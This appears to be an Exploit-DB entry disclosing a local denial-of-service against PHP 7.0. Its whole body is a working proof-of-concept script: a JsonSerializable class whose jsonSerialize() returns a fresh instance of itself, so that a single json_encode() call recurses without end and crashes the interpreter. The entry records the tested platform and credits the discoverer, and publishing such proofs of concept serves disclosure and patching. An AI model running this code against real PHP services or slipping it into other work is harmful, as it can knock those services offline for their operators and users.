PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service

EDB-ID: 40329
CVE: N/A
Type: dos
Platform: PHP
Date: 2016-08-31

<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
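class jsonTmp implements JsonSerializable {
	// jsonSerialize() returns a fresh jsonTmp instance, which is itself
	// JsonSerializable, so json_encode() has to serialize it again, without end.
	function jsonSerialize() {
		$jsonTmp = new jsonTmp();
		return $jsonTmp;
	}
}
// Trigger: encoding one instance starts the unbounded jsonSerialize() recursion.
json_encode(new jsonTmp());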
?>